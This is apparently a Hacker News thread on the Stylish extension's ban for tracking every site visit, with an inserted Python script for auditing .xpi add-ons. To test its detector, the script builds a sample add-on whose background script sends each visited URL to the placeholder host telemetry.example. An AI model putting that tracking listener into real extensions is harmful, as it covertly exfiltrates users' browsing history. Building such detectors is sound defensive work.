
“Stylish” extension with 2M downloads banned for tracking every site visit - jhack
https://arstechnica.com/information-technology/2018/07/stylish-extension-with-2m-downloads-banished-for-tracking-every-site-visit/
======
dagenix
This type of thing seems to keep happening. And there doesn't seem to be a
good solution. Browser vendors don't want to scrutinize every extension
available on their platforms since there is no financial incentive to.
Notably, I don't think extension authors want browser vendors to scrutinize
their extensions as that would delay getting out updates and fixes. Users want
vendors to catch all the bad stuff, but would probably be outraged on behalf
of their favorite extension the second any review process went away (i.e. users
want the magical no-downside approach).

So, it's not really clear to me that anyone really wants a real review process
created.

However, any extension which becomes popular instantly is put under pressure
to sell to someone else who wants to do this type of nonsense. Of course, the
extension author may not know which companies that want to buy their work want
to violate user privacy and which don't - they just have an offer to pay for
their work. So, even the authors that sell aren't necessarily doing anything
wrong (at least not intentionally).

And there doesn't really seem to be a way for browser vendors to alert users
when ownership of an extension changes - they may not even know, and even if
they did, it seems unlikely that most users would know what to do with that
information.

There just doesn't seem to be anyone in this whole process that really has an
incentive to make things better. It seems like the only reasonable advice is
to avoid extensions or only use extensions from major companies - which is
kinda sad advice.

~~~
eridius
> _Browser vendors don't want to scrutinize every extension available on
> their platforms since there is no financial incentive to._

This is precisely what Apple tried to do with the Safari Extensions Gallery,
and they got pilloried for it.

------
LinuxBender
Could they have captured banking or other financial or sensitive data?

The author used burp, but couldn't you also validate what is collected more
explicitly by viewing the xpi contents for that add-on?

~~~
silverwind
Yes, this should have been noticed during the mandatory code review that every
extension has to undergo.
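
The static look at the xpi contents that LinuxBender suggests above, as an added example that is not part of this thread or of any real add-on: an .xpi is a zip, so this script reads manifest.json for permissions (flagging broad host access such as `<all_urls>`) and scans the bundled scripts for outbound-request constructs and hard-coded URLs. The sample add-on it audits is constructed inline; the endpoint `telemetry.example` is a placeholder, not anything from the article.

```python
import io
import json
import re
import zipfile

# Constructs in extension scripts that indicate outbound network activity.
NETWORK_PATTERNS = [
    r"\bfetch\s*\(",
    r"\bXMLHttpRequest\b",
    r"navigator\.sendBeacon\s*\(",
    r"https?://[\w.-]+",
]
# Host patterns that let an add-on touch every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_xpi(data: bytes) -> dict:
    """Summarise permissions and network indicators found inside an .xpi archive."""
    report = {"permissions": [], "broad_host_access": False, "network_hits": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        manifest = json.loads(z.read("manifest.json"))
        # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
        perms = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
        report["permissions"] = perms
        report["broad_host_access"] = any(p in BROAD_HOSTS for p in perms)
        for name in z.namelist():
            if not name.endswith(".js"):
                continue
            src = z.read(name).decode("utf-8", errors="replace")
            hits = sorted({m.group(0) for pat in NETWORK_PATTERNS for m in re.finditer(pat, src)})
            if hits:
                report["network_hits"][name] = hits
    return report


def build_sample_xpi() -> bytes:
    """Constructed sample add-on (hypothetical, not Stylish) that reports visited URLs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps({
            "manifest_version": 2, "name": "sample", "version": "1.0",
            "permissions": ["tabs", "storage", "<all_urls>"],
            "background": {"scripts": ["background.js"]},
        }))
        z.writestr("background.js",
                   'browser.tabs.onUpdated.addListener((id, info) => {\n'
                   '  if (info.url) fetch("https://telemetry.example/collect?u=" + encodeURIComponent(info.url));\n'
                   '});\n')
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(audit_xpi(build_sample_xpi()), indent=2))
```

Running it against a real add-on means feeding the downloaded .xpi bytes to `audit_xpi`; a broad host pattern combined with a script that posts tab URLs is the signature the article describes, and the URL hits tell you where to point a proxy like Burp for confirmation.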

------
JdeBP
Still open discussion of the original, of which this is a news report:

* [https://news.ycombinator.com/item?id=17447816](https://news.ycombinator.com/item?id=17447816)

------
stephengillie
It's remarkable that uMatrix and uBlock Origin haven't sold out yet. What will
we do if/when they do?

~~~
jwalton
(This is a bit of an oversimplification, but...) uBlock Origin is already the
fork of uBlock from when uBlock sold out.

